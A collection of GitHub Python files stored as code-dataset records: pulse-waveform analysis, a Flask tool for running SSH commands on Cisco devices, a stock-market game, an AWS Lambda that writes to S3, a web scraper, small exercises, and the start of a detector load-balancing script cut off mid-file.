self.pulse_times[\"Tf_end\"]\n Tf = self.pulse_times[\"Tf\"]\n Tau = self.pulse_times[\"Tau\"]\n Ymax = self.pulse_times[\"Ymax\"]\n Ymin = self.pulse_times[\"Ymin\"]\n Yamp = self.pulse_times[\"Yamp\"]\n upper_threshold = self.pulse_times[\"upper\"]\n lower_threshold = self.pulse_times[\"lower\"]\n\n # 保存先のディレクトリパスが存在しなければ作成\n dir_path = os.path.dirname(save_path)\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n\n # グラフ化\n ax = plt.axes()\n plt.rcParams['font.family'] = 'Times New Roman' # 全体のフォント\n plt.rcParams['axes.linewidth'] = 1.0 # 軸の太さ\n\n # 電流値をプロット\n plt.plot(x, y, lw=1, c=\"r\", alpha=0.7, ms=2, label=label_name)\n\n # 立上り・下りの開始、終了時間、時定数に垂線をプロット\n plt.vlines(Tr_start, min(y), max(y), ls='--',\n color=\"b\", lw=1, label=\"Tr start\")\n plt.vlines(Tr_end, min(y), max(y), ls='--',\n color=\"g\", lw=1, label=\"Tr end\")\n plt.vlines(Tf_start, min(y), max(y),\n ls='--', lw=1, label=\"Tf start\")\n plt.vlines(Tf_end, min(y), max(y), ls='--',\n color=\"m\", lw=1, label=\"Tf end\")\n plt.vlines(Tau, min(y), max(y), ls='-', lw=1, label=\"Tau\")\n\n # 電流最大値の10%、90%に水平線をプロット\n plt.hlines(Yamp * 0.9, min(x), max(x), ls='--',\n color=\"r\", lw=1, label=\"Amp \" + sTr(upper_threshold*100)+\"%\")\n plt.hlines(Yamp * 0.1, min(x), max(x), ls='--',\n color=\"y\", lw=1, label=\"Amp \" + sTr(lower_threshold*100)+\"%\")\n\n # グラフの保存\n plt.legend(loc=\"best\") # 凡例の表示(2:位置は第二象限)\n plt.xlabel('Time[msec]', fontsize=12) # x軸ラベル\n plt.ylabel('Current[A]', fontsize=12) # y軸ラベル\n plt.grid() # グリッドの表示\n plt.legend(loc=\"best\") # 凡例の表示\n plt.savefig(save_path)\n plt.clf()\n\n # 実効値の計算\n def calc_rms(self, y):\n return np.sqrt(np.square(y).mean()) # 実効値の計算\n\n\ndef main():\n pulse = Pulse()\n\n # 読み込むCSVファイルのパス\n csv_path = \"C:/prog/python/auto/current.csv\"\n save_path = \"C:/prog/python/auto/\"\n\n # 空のデータフレームを作成\n df = pd.DataFrame({})\n\n # CSVファイルのロードし、データフレームへ格納\n df = pd.read_csv(csv_path, encoding=\"UTf-8\", skiprows=0)\n\n # 電流値の列データを取り出し\n Its = df.loc[:, \"current\"]\n\n # 経過時間の列データを取り出し\n ts = df.loc[:, \"time\"]\n\n # 各種時間を計算(上限90%、下限10%)\n pulse.calc_time(ts, Its, Ymin=0, Ton_min=50)\n times = pulse.show_time()\n pulse.save_graph(\n ts, Its, xlabel=\"Time[msec]\", ylabel=\"Current[A]\", save_path=save_path+\"a.png\", label_name=\"I(t)\")\n\n \"\"\"\n Tr start: 8.4\n Tr end: 328.2\n Tr: 319.8\n Ton: 278.8\n Tf start: 607.0\n Tr end: 620.8\n Tf: 13.799999999999955\n Tau: 114.39999999999999\n RMS: 249.061976770524\n \"\"\"\n print(\"RMS:\", pulse.calc_rms(Its))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"homura2/libs","sub_path":"python/calc2/calc2/electricity/pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":9158,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70911587619","text":"from flask import Flask, request, render_template\nfrom netmiko import ConnectHandler\nimport re\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n\n@app.route(\"/command\", methods=[\"POST\"])\ndef command():\n devices = []\n for i in range(1, int(request.form[\"device_count\"]) + 1):\n devices.append({\n \"device_type\": \"cisco_ios\",\n \"host\": request.form[f\"device_{i}_hostname\"],\n \"username\": request.form[f\"device_{i}_username\"],\n \"password\": request.form[f\"device_{i}_password\"],\n })\n print(devices)\n commands = request.form[\"commands\"] # A textarea with multiple lines\n print(commands)\n output = {}\n for device in devices:\n print(f'Connecting to {device[\"host\"]}')\n with ConnectHandler(**device) as ssh:\n for command in commands.split(\"\\n\"):\n print(f'Executing command: {command} on {device[\"host\"]}')\n # append the output to the dictionary with the key being the hostname\n if device[\"host\"] not in output:\n output[device[\"host\"]] = []\n output_command = ssh.send_command(command)\n output[device[\"host\"]].append({\n \"command\": command,\n # trim the spaces and tabs from the output\n \"output\": output_command\n })\n\n return render_template(\"result.html\", output=output)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"fluid-design-io/cisco-ssh-multi-console-viewer","sub_path":"backend/flask(old)/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25126803858","text":"import os\ntry:\n import CPickle as pickle\nexcept ImportError:\n import pickle\nfrom math import pi, cos, sin\nimport random\nimport pygame as pg\nfrom .. import prepare\nfrom .industry import Industry\nfrom .industry_info import INDUSTRIES\nfrom .labels import Label, Button, ButtonGroup\nfrom .animation import Animation, Task\nfrom .player import Player\n\n\nTWOPI = pi * 2\n\n\nclass Economy(object):\n def __init__(self):\n self.interest_rate = .05\n conditions = [\"Dismal\", \"Grizzly\", \"Bearish\", \"Flat\",\n \"Bullish\", \"Taurific\", \"Phenomenal\"]\n self.condition_names = {x: name for x, name in enumerate(conditions, start=-3)}\n colors = (\"red\", \"orangered\", \"orange\", \"gray90\", \"yellowgreen\", \"greenyellow\", \"green\")\n self.condition_colors = {x: color for x, color in enumerate(colors, start=-3)}\n self.next_conditions = {\n -3: (-3, -2, -2, -1),\n -2: (-3, -2, -2, -1, -1, -1, 0),\n -1: (-3, -2, -2, -1, -1, -1, -1, 0, 0, 0, 0, 1, 1),\n 0: (-2, -1, -1, 2, 1, 1, 1, 0, 0, 0, 0),\n 1: (3, 2, 2, 1, 1, 1, 1, 0, 0, 0, 0, -1, -1),\n 2: (3, 2, 2, 1, 1, 1, 0),\n 3: (3, 2, 2, 1)\n }\n self.condition = 0\n \n hourly_change_ranges = [(.70, 1.01125), (.85,1.025), (.90, 1.05), (.95, 1.05),\n (.95, 1.10), (.975, 1.15), (.9875,1.3)]\n self.hourly_changes = {x: change for x, change in enumerate(hourly_change_ranges, start=-3)} \n self.daily_interest_changes = {\n -3: (1.0, 1.01),\n -2: (1.0, 1.005),\n -1: (1.0, 1.0025),\n 0: (1.0, 1.0),\n 1: (.975, 1.0),\n 2: (.95, 1.0),\n 3: (.9, 1.0)\n }\n activity = (\"Dead\", \"Tepid\", \"Tame\", \"Busy\", \"Hectic\", \"Manic\")\n activity_chances = (25, 50, 100, 200, 400, 700) #chance in 1000 that price will move\n self.activity_chances = {x: chance for x, chance in enumerate(activity_chances)}\n self.activity_names = {x: name for x, name in enumerate(activity)}\n self.activity = 2\n \n self.make_industries(INDUSTRIES)\n \n \n self.companies = [] \n for industry in self.industries:\n self.companies.extend(industry.companies)\n \n \n self.hours = 0\n self.day = 0\n self.sim_speeds = {0: \"Paused\",\n 1: \"Very Slow\",\n 2: \"Slow\",\n 3: \"Normal\",\n 4: \"Fast\",\n 5: \"Very Fast\"}\n self.hour_lengths = {0: 0,\n 1: 10000,\n 2: 5000,\n 3: 2500,\n 4: 625,\n 5: 100}\n self.sim_speed = 5\n self.current_quarter = 1\n self.timer = 0\n self.game_clock = GameClock((16, 20), self)\n self.ticker_tape = TickerTape()\n \n #Seed Economy\n for _ in range(1000):\n self.update(100, Player())\n \n def save(self, player):\n #can't pickle surfaces, oops\n self.game_clock = None\n self.ticker_tape = None\n for c in self.companies:\n c.investments.empty()\n e_path = os.path.join(\"resources\", \"saves\", \"econsave.pickle\")\n p_path = os.path.join(\"resources\", \"saves\", \"playersave.pickle\")\n with open(e_path, \"wb\") as e_save:\n econ = pickle.dump(self, e_save)\n with open(p_path, \"wb\") as p_save:\n player_ = pickle.dump(player, p_save)\n \n def update(self, dt, player):\n self.game_clock.update(dt, self.hour_lengths[self.sim_speed])\n if self.hour_lengths[self.sim_speed]:\n self.timer += dt\n if self.timer >= self.hour_lengths[self.sim_speed]:\n self.timer -= self.hour_lengths[self.sim_speed]\n self.hours += 1\n self.hourly_update()\n \n if self.hours == 8:\n self.day += 1\n self.hours = 0\n self.daily_update()\n self.game_clock.reset()\n \n if not self.day % 7:\n self.weekly_update()\n \n if not self.day % 91:\n self.ticker_tape.news_items = []\n self.quarterly_update(player)\n \n def get_industry_averages(self): \n averages = {}\n for industry in self.industries:\n num = 0.\n cash = 0\n assets = 0\n debt = 0\n bv = 0\n rev = 0\n earn = 0\n pe_ratio = 0\n dividends = 0\n for c in industry.companies:\n num += 1\n cash += c.cash\n assets += c.assets\n debt += c.debt\n bv += c.daily_history[-1][1] / float(c.stock.num_shares)\n rev += c.daily_history[-1][3] / float(c.stock.num_shares)\n earn += c.daily_history[-1][6] / float(c.stock.num_shares)\n pe_ratio += float(c.stock.price) / (earn / float(c.stock.num_shares))\n dividends += float(c.stock.dividend)\n if num:\n averages[industry.name] = cash/num, assets/num, debt/num, bv/num, rev/num, earn/num, pe_ratio/num, dividends/num\n else:\n averages[industry.name] = 0, 0, 0, 0, 0, 0, 0, 0\n return averages\n \n def update_condition(self):\n chance = abs(self.condition)\n if random.randint(0, 10) <= chance:\n self.condition = random.choice(self.next_conditions[self.condition])\n self.interest_rate = self.interest_rate * random.uniform(*self.daily_interest_changes[self.condition])\n self.interest_rate = max(0, min(.15, self.interest_rate))\n \n def hourly_update(self): \n #change prices for stocks\n for c in self.companies:\n c.hourly_update(self)\n \n def daily_update(self):\n self.update_condition()\n for c in self.companies:\n c.daily_update(self)\n \n def weekly_update(self):\n #update_condition - more variance than daily\n for c in self.companies:\n c.weekly_update(self)\n \n def monthly_update(self):\n for c in self.companies:\n c.monthly_update(self)\n \n def quarterly_update(self, player):\n for c in self.companies:\n c.quarterly_update(self, player) \n \n def make_industries(self, industries):\n self.industries = []\n for ind in industries:\n self.industries.append(Industry(ind, self))\n \n \nclass GameClock(object):\n def __init__(self, topleft, economy):\n self.economy = economy\n self.image = prepare.GFX[\"clockicon\"]\n self.rect = self.image.get_rect(topleft=topleft)\n self.hour_angle = pi\n self.minute_angle = pi / 2.\n self.buttons = ButtonGroup()\n font = prepare.FONTS[\"weblysleekuisb\"]\n self.speed_name = self.economy.sim_speeds[self.economy.sim_speed]\n \n yrs, days = divmod(self.economy.day, 364)\n self.date = Label(font, 14, \"Yr: {} Day{}\".format(yrs + 1, days), \"gray80\",\n {\"midbottom\": self.rect.midtop})\n self.label = Label(font, 14, self.speed_name, \"gray80\",\n {\"midtop\": self.rect.midbottom})\n Button((self.rect.left, self.label.rect.bottom - 5, 20, 20), self.buttons, text=\"-\",\n font=font, font_size=16, call=self.decrease_speed) \n Button((self.rect.right - 20, self.label.rect.bottom - 5, 20, 20), self.buttons, text=\"+\",\n font=font, font_size=16, call=self.increase_speed)\n \n def decrease_speed(self, *args):\n self.economy.sim_speed = max(0, self.economy.sim_speed - 1)\n self.speed_name = self.economy.sim_speeds[self.economy.sim_speed]\n self.label.set_text(self.speed_name)\n \n def increase_speed(self, *args):\n self.economy.sim_speed = min(5, self.economy.sim_speed + 1)\n self.speed_name = self.economy.sim_speeds[self.economy.sim_speed]\n self.label.set_text(self.speed_name)\n \n def update(self, dt, hour_length):\n if hour_length != 0:\n self.hour_angle -= ((TWOPI / 12.) / float(hour_length)) * dt\n self.hour_angle = self.hour_angle % TWOPI \n self.hour_endpoint = (self.rect.centerx + cos(self.hour_angle) * 26,\n self.rect.centery - sin(self.hour_angle) * 26)\n mouse_pos = pg.mouse.get_pos()\n self.buttons.update(mouse_pos)\n yrs, days = divmod(self.economy.day, 364)\n self.date.set_text(\"Yr {} Day {}\".format(yrs + 1, days))\n \n def get_event(self, event):\n self.buttons.get_event(event)\n \n def reset(self):\n #set clock to 9am\n self.hour_angle = pi\n \n def draw(self, surface):\n surface.blit(self.image, self.rect)\n pg.draw.line(surface, pg.Color(\"gray20\"), self.rect.center, self.hour_endpoint)\n self.buttons.draw(surface)\n self.label.draw(surface)\n self.date.draw(surface)\n \n \nclass TickerLabel(object):\n \n def __init__(self, news_item, midleft):\n self.font = prepare.FONTS[\"weblysleekuisb\"]\n self.label = Label(self.font, 16, news_item, \"gray80\", {\"midleft\": midleft})\n self.done = False\n \n def draw(self, surface):\n self.label.draw(surface)\n\n \nclass TickerTape(object):\n def __init__(self):\n top = 520\n self.rect = pg.Rect(0, top, prepare.SCREEN_SIZE[0], prepare.SCREEN_SIZE[1] - top) \n self.duration = 9000 \n self.news_items = []\n self.labels = []\n self.start_pos = self.rect.right + 10, self.rect.centery\n self.animations = pg.sprite.Group()\n \n def set_done(self, ticker):\n ticker.done = True\n \n def add_news(self, news_item):\n self.news_items.append(news_item)\n \n def update(self, dt):\n self.animations.update(dt)\n self.labels = [x for x in self.labels if not x.done]\n \n if self.news_items:\n if not self.labels or (self.labels[-1].label.rect.right < prepare.SCREEN_SIZE[0] - 60):\n item = self.news_items[0]\n ticker = TickerLabel(item, self.start_pos)\n self.labels.append(ticker)\n ani = Animation(x=-500, duration=self.duration, round_values=True)\n ani.start(ticker.label.rect)\n task = Task(self.set_done, self.duration, args=(ticker,))\n self.animations.add(task, ani)\n if len(self.news_items) > 1:\n self.news_items = self.news_items[1:]\n else:\n self.news_items = []\n\n def draw(self, surface):\n pg.draw.rect(surface, pg.Color(43,68,87), self.rect)\n pg.draw.line(surface, pg.Color(\"gray40\"), self.rect.topleft, self.rect.topright, 2) \n for label in self.labels:\n label.draw(surface)\n ","repo_name":"iminurnamez/Market-Master","sub_path":"data/components/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":11612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17751060577","text":"from datetime import datetime, timedelta\nfrom rl_bakery.engine.timing_data import TimingData\nfrom rl_bakery.data_manager.data_manager import DATANAME\nfrom rl_bakery.operation.build_time_step_operation import BuildTimestepOperation\nfrom rl_bakery.spark_utilities import PySparkTestCase\nfrom unittest import TestCase\nfrom unittest.mock import call, patch\nfrom omegaconf import OmegaConf\nimport mock\n\nclass MockEnv:\n\n def build_time_steps(self, previous_run_dt, current_run_dt):\n pass\n\nclass BuildTimestepOperationTest(PySparkTestCase, TestCase):\n @patch('rl_bakery.data_manager.data_manager.DataManager', autospec=True)\n def test_timestep_operation(self, mock_data_manager):\n start_dt = datetime.now()\n training_interval = timedelta(days=1)\n\n mock_env = mock.MagicMock()\n\n conf = OmegaConf.from_dotlist([\"project.tensorboard_path=/tmp/test_tb/\"])\n mock_app = mock.MagicMock()\n mock_app.timing_data = TimingData(start_dt=start_dt, training_interval=training_interval)\n mock_app.env = mock_env\n mock_app.config = conf\n mock_env.env_id_cols = [\"env_id_1\", \"env_id_2\"]\n mock_env.ts_id_col = \"ts_1\"\n mock_env.obs_cols = [\"obs_1\", \"obs_2\"]\n\n mock_timestep = [{\"env_id_1\": 1, \"env_id_2\": 2, \"ts_1\": 1, \"discount\": 1.0, \"obs_1\": 1, \"obs_2\": 2, \"action\": 1, \"reward\": 0.0,\n \"step_type\": 0}]\n mock_timestep_df = self.spark.createDataFrame(mock_timestep)\n\n metadata_dict = {\n \"available_data\": [(\"test_data\", 0)]\n }\n\n mock_env.build_time_steps = mock.MagicMock(return_value=mock_timestep_df)\n mock_data_manager.get_latest.return_value = metadata_dict\n\n run_id = 1\n operation = BuildTimestepOperation(mock_app, mock_data_manager)\n operation.run(run_id)\n\n mock_data_manager.get_latest.assert_any_call(DATANAME.RUN_CONTEXT, run_id)\n\n expected_start_dt = start_dt\n expected_end_dt = start_dt + training_interval\n mock_env.build_time_steps.assert_called_with(expected_start_dt, expected_end_dt)\n\n expected_metadata = {\n \"available_data\": [\n (\"test_data\", 0),\n (DATANAME.TIMESTEP, run_id)\n ]\n }\n\n calls = [\n call(mock_timestep_df, DATANAME.TIMESTEP, run_id),\n call(expected_metadata, DATANAME.RUN_CONTEXT, run_id)]\n mock_data_manager.store.assert_has_calls(calls, any_order=False)\n","repo_name":"zynga/rl-bakery","sub_path":"rl_bakery/operation/test_build_time_step_operation.py","file_name":"test_build_time_step_operation.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"34"} +{"seq_id":"8322847304","text":"import json\nimport re\nfrom datetime import datetime\nfrom collections import defaultdict\nimport boto3\n\ndef numbers_to_csv_string(numbers: list[int]):\n\n output = 'previos Fibonacci number,observed number,nex Fibonacci number\\n'\n\n # edge case - list is empty -> output is just the header (column names)\n if len(numbers) == 0:\n return output\n\n # pointer for going through numbers list\n left = 0\n\n # checking and processing negative numbers (assuming we didn't reach the end of the numbers list)\n while left < len(numbers) and numbers[left] < 0:\n\n # adding string consisting of the number surrounded by comas with line break at the end\n # to the end of output variable\n output += ',' + str(numbers[left]) + ',\\n'\n left += 1\n\n # if current number is 0 (assuming we didn't reach the end of the numbers list)\n if left < len(numbers) and numbers[left] == 0:\n output += ',0,1\\n'\n left += 1\n\n # if current number is 1 (assuming we didn't reach the end of the numbers list)\n if left < len(numbers) and numbers[left] == 1:\n output += '0,1,1\\n'\n left += 1\n\n # setting up the prev, current and nex variables (to store previous, current and next number in the sequence\n # respectively\n prev = 1\n current = 1\n nex = prev + current\n\n # going through the numbers from where we left off with the left pointer\n for n in numbers[left:]:\n\n # if n is bigger then current number in the fibonacci sequence, generate new number in the sequence by adding\n # two previous numbers, eventually n will equal to a fib number or be larger than it\n while n > current:\n prev, current = current, current + prev\n nex = current + prev\n\n # n equals to a fibonacci number exactly\n # add prev, current and next with comas between as a row to the output string\n if n == current:\n to_append = str(prev) + ',' + str(current) + ',' + str(nex) + '\\n'\n output += to_append\n\n # n is smaller fibonacci number (it's in between numbers), add just current with comas around\n # as a row to the output string\n elif n < current:\n output += ',' + str(n) + ',\\n'\n\n return output\n\n\ndef fibonacci_process(numbers: list):\n\n # checking if the list is empty - no integers/numbers found\n if len(numbers) == 0:\n return numbers_to_csv_string([])\n\n # I turn numbers into set to get just the unique numbers as it is in the example output\n # print(numbers)\n numbers = list(set(numbers))\n\n # convert numbers to int using list comprehension - regex returns matches as strings, in general input is usually\n # by default also a string\n numbers = [int(x) for x in numbers]\n # sort numbers list inplace\n numbers.sort()\n\n #convert numbers to a CSV compliant string using numbers_to_csv_string function\n output = numbers_to_csv_string(numbers)\n\n return output\n\n\ndef count_words(words: list):\n words = list(map(str.lower, words))\n word_count = defaultdict(int)\n\n for w in words:\n # print(w)\n word_count[w] += 1\n\n return word_count\n\ndef filename_now():\n now = datetime.now()\n return now.strftime(\"%Y_%m_%d__%H_%M_%S__%f\")\n\ndef lambda_handler(event, context):\n\n s3 = boto3.client('s3')\n bucket = 'word-count-fibonacci-005'\n\n # no data in post -> body doesn't exist\n if 'body' not in event:\n\n transaction_response = {}\n transaction_response['message'] = 'Error, no post data'\n\n response_object = {}\n response_object['statusCode'] = 400\n response_object['headers'] = {}\n response_object['headers']['Content-Type'] = 'application/json'\n response_object['message'] = 'Error, no post data'\n response_object['body'] = json.dumps(transaction_response)\n\n return response_object\n\n body = event['body']\n print(event)\n print(body)\n\n # joining body (list) into one long string\n body = ''.join(body)\n\n # print(len(body))\n\n # Using regex I'm matching all 'digit collections' to find integers. I treat '.' as the separator as that seems to\n # as negative integers are also integers they are also matched\n # be the case looking at the example input/output\n numbers = re.findall('-?\\d+', body)\n\n str_csv = fibonacci_process(numbers)\n # print(str_csv)\n\n file_ = filename_now() + '.csv'\n byte_stream = bytes(str_csv.encode('UTF-8'))\n r = s3.put_object(Bucket=bucket, Key=file_, Body=byte_stream)\n print('s3 put integers content: ', r)\n\n # matching just latin letters: words = re.findall('[A-Za-z]+', body)\n\n # following matches unicode letters\n words = re.findall('[\\u00BF-\\u1FFF\\u2C00-\\uD7FFA-Za-z]+', body)\n words = count_words(words)\n\n file_ = file_[:-3] + '.json'\n byte_stream = bytes(json.dumps(words).encode('UTF-8'))\n r = s3.put_object(Bucket=bucket, Key=file_, Body=byte_stream)\n print('s3 put words content: ', r)\n\n transaction_response = {}\n\n # transaction_response['numbers'] = numbers\n # transaction_response['string_csv'] = str_csv\n # transaction_response['words'] = words\n transaction_response['message'] = 'Files generated'\n\n response_object = {}\n response_object['statusCode'] = 200\n response_object['headers'] = {}\n response_object['headers']['Content-Type'] = 'application/json'\n response_object['message'] = 'Hello from lambda'\n response_object['body'] = json.dumps(transaction_response)\n\n return response_object\n","repo_name":"python-wizard/tasks-lambda-pandas","sub_path":"task1_lambda/lambda_handler.py","file_name":"lambda_handler.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22875954339","text":"import heapq\nfrom collections import defaultdict\n\nlines = None\n\n\ndef myinput():\n global lines\n if lines is None:\n lines = [it.strip() for it in open(\"../in.txt\").readlines()]\n tmp = lines[0]\n lines = lines[1:]\n return tmp\n\n\n# =====================\n# input = myinput\n\n\ndef solve():\n n, k = map(int, input().split())\n # aa = [int(it) for it in input().split()]\n if k * (k + 1) // 2 > n:\n print(\"-1\")\n return\n a = int(n / k - (k - 1) / 2)\n more_to_move = n - sum(range(a,a+k))\n res = 1\n def mul(f):\n nonlocal res\n res *= f\n res %= 10**9+7\n n_stay = k-more_to_move\n for i in range(a,a+n_stay):\n mul(i)\n mul(i-1)\n for i in range(a+n_stay+1,a+k+1):\n mul(i)\n mul(i-1)\n print(res)\n\n\n# ======================\nT = int(input().strip())\nfor tid in range(1, 1 + T):\n solve()\n","repo_name":"swantescholz/algorithmic-utils","sub_path":"smackdown/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"27480917013","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\n\nif __name__ == '__main__':\n\n links = []\n elements = []\n pool = ['спид', 'рак', 'инсульт', 'орви', 'диабет', 'covid-19', 'гепатит']\n # pool = ['гепатит']\n\n # url = 'https://minobrnauki.gov.ru/press-center/'\n root = 'https://medportal.ru'\n\n for i in range(1, 282):\n if i == 1:\n url = 'https://medportal.ru/mednovosti/all/'\n else:\n url = 'https://medportal.ru/mednovosti/all/?page=' + str(i)\n\n print(str(i) + ' / 281')\n response = requests.get(url=url)\n response.encoding = 'utf-8'\n soup = BeautifulSoup(response.text, 'lxml')\n articles = soup.find_all('a', class_='title')\n\n for elem in articles:\n string = str(elem)\n index = string.find(\"\\\">\", 23, len(string))\n href = string[23:index]\n link = root + href\n\n try:\n response = requests.get(url=str(link))\n soup = BeautifulSoup(response.text, 'lxml')\n article_text = soup.find('div', class_='article')\n for word in str(article_text.text).split():\n article_elem = word.lower()\n if article_elem in pool:\n print('Статья подходит:')\n print(link)\n links.append(link)\n elements.append(article_elem)\n break\n except:\n continue\n\n frame = {'Links': pd.Series(links), 'Words': pd.Series(elements)}\n df = pd.DataFrame(frame)\n filename = 'stat.csv'\n df.to_csv(filename)\n","repo_name":"Aleksey1123/AI_Project","sub_path":"scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14974474906","text":"\"\"\"\nGiven an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.\n\nYou may assume that the array is non-empty and the majority element always exist in the array.\n\nExample 1:\n\nInput: [3,2,3]\nOutput: 3\nExample 2:\n\nInput: [2,2,1,1,1,2,2]\nOutput: 2\n\"\"\"\n\nclass Solution:\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n d = {}\n for n in nums:\n if n in d.keys():\n d[n] += 1\n else:\n d[n] = 1\n for key, value in d.items():\n if value > len(nums) / 2:\n return key","repo_name":"ipudu/leetcode","sub_path":"solutions/169_majority-element.py","file_name":"169_majority-element.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"35825904993","text":"import sys\r\n\r\n\r\ndef calc_bmi(height, weight):\r\n bmi = (weight / height ** 2) * 703\r\n return bmi\r\n\r\n\r\ndef getCategory(bmi):\r\n if bmi >= 30:\r\n return\"obese\"\r\n\r\n elif 25 <= bmi < 30:\r\n return\"overweight\"\r\n\r\n elif 18.5 <= bmi < 25:\r\n return\"normal\"\r\n\r\n else:\r\n return\"underweight\"\r\n\r\n\r\nfor i in range(1, len(sys.argv)):\r\n name = sys.argv[i].split(\",\")[0]\r\n capName = name.capitalize()\r\n height = int(sys.argv[i].split(\",\")[3])\r\n weight = int(sys.argv[i].split(\",\")[4])\r\n bmi = calc_bmi(height, weight)\r\n category = getCategory(bmi)\r\n print(\"{}: {:.2f} , {}\".format(capName, bmi, category))\r\n","repo_name":"Awright919/Data-Programming-1","sub_path":"Assignment_6/Assign6_2_2.py","file_name":"Assign6_2_2.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41973999520","text":"#!/usr/bin/python3\n\"\"\"A Python script that takes 2 arguments\"\"\"\nimport requests\nfrom sys import argv\n\nif __name__ == \"__main__\":\n url = \"https://api.github.com/repos/{}/{}/commits?per_page=10\"\\\n .format(argv[2], argv[1])\n\n response = requests.get(url)\n commits = response.json()\n for commit in commits:\n print(\"{}: {}\".format(commit.get(\"sha\"),\n commit.get(\"commit\").get(\"author\").get(\"name\")))\n","repo_name":"ROgbuagu05/alx-higher_level_programming","sub_path":"0x11-python-network_1/100-github_commits.py","file_name":"100-github_commits.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5378634272","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\n\nclass CustomUser(AbstractUser):\n favorites = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return \"%s %s %s\" % (self.first_name, self.last_name, self.email)\n\n\nclass Blog(models.Model):\n title = models.CharField(max_length=100)\n content = models.TextField(blank=True, null=True)\n vote = models.IntegerField(default=0)\n accountID = models.ForeignKey(CustomUser, on_delete=models.CASCADE)\n","repo_name":"tongtrieu76/Django-Api-Learning","sub_path":"CustomUser_API/Learning/data/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"847902198","text":"#!/usr/bin/env python3\nimport sys\nsys.path.insert(1, './externals')\nimport ROOT\nimport numpy as np\nimport mlrose_mod as mlrose # Author: Genevieve Hayes https://github.com/gkhayes/mlrose/tree/master/mlrose\nimport time\nimport yaml\nimport signal\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, OneHotEncoder\nfrom sklearn.metrics import accuracy_score\n\nfrom process import getModuleHists, getlpGBTHists, getMiniGroupHists, getMinilpGBTGroups, getMiniModuleGroups, getBundles, getBundledlpgbtHists, getBundledlpgbtHistsRoot, calculateChiSquared, getMaximumNumberOfModulesInABundle\nfrom process import loadDataFile, loadModuleTowerMappingFile, getTCsPassing, getlpGBTLoadInfo, getHexModuleLoadInfo, getModuleTCHists, getMiniTowerGroups, getTowerBundles\nfrom plotting import plot, plot2D\nfrom example_minigroup_configuration import example_minigroup_configuration\n\nfrom geometryCorrections import applyGeometryCorrections\n\nchi2_min = 50000000000000000000000\ncombbest = []\n\ndef handler(signum, frame):\n raise ValueError() \n\ndef plot_lpGBTLoads(MappingFile,CMSSW_Silicon,CMSSW_Scintillator):\n\n #Load external data\n data = loadDataFile(MappingFile) #dataframe \n data_tcs_passing,data_tcs_passing_scin = getTCsPassing(CMSSW_Silicon,CMSSW_Scintillator) #from CMSSW\n \n lpgbt_loads_tcs,lpgbt_loads_words,lpgbt_layers = getlpGBTLoadInfo(data,data_tcs_passing,data_tcs_passing_scin)\n\n plot(lpgbt_loads_tcs,\"loads_tcs.png\",binwidth=0.1,xtitle='Number of TCs on a single lpGBT')\n plot(lpgbt_loads_words,\"loads_words.png\",binwidth=0.1,xtitle='Number of words on a single lpGBT')\n plot2D(lpgbt_loads_tcs,lpgbt_layers,\"tcs_vs_layer.png\",xtitle='Number of TCs on a single lpGBT')\n plot2D(lpgbt_loads_words,lpgbt_layers,\"words_vs_layer.png\",xtitle='Number of words on a single lpGBT')\n\ndef plot_ModuleLoads(MappingFile,CMSSW_Silicon,CMSSW_Scintillator):\n\n #Load external data\n data = loadDataFile(MappingFile) #dataframe \n data_tcs_passing,data_tcs_passing_scin = getTCsPassing(CMSSW_Silicon,CMSSW_Scintillator) #from CMSSW\n \n lpgbt_loads_tcs,lpgbt_loads_words,lpgbt_layers = getHexModuleLoadInfo(data,data_tcs_passing,data_tcs_passing_scin)\n\n plot(lpgbt_loads_tcs,\"loads_tcs.png\",binwidth=0.1,xtitle='Number of TCs on a single lpGBT')\n plot(lpgbt_loads_words,\"loads_words.png\",binwidth=0.1,xtitle='Number of words on a single lpGBT')\n plot2D(lpgbt_loads_tcs,lpgbt_layers,\"tcs_vs_layer.png\",xtitle='Number of TCs on a single lpGBT')\n plot2D(lpgbt_loads_words,lpgbt_layers,\"words_vs_layer.png\",xtitle='Number of words on a single lpGBT')\n \ndef 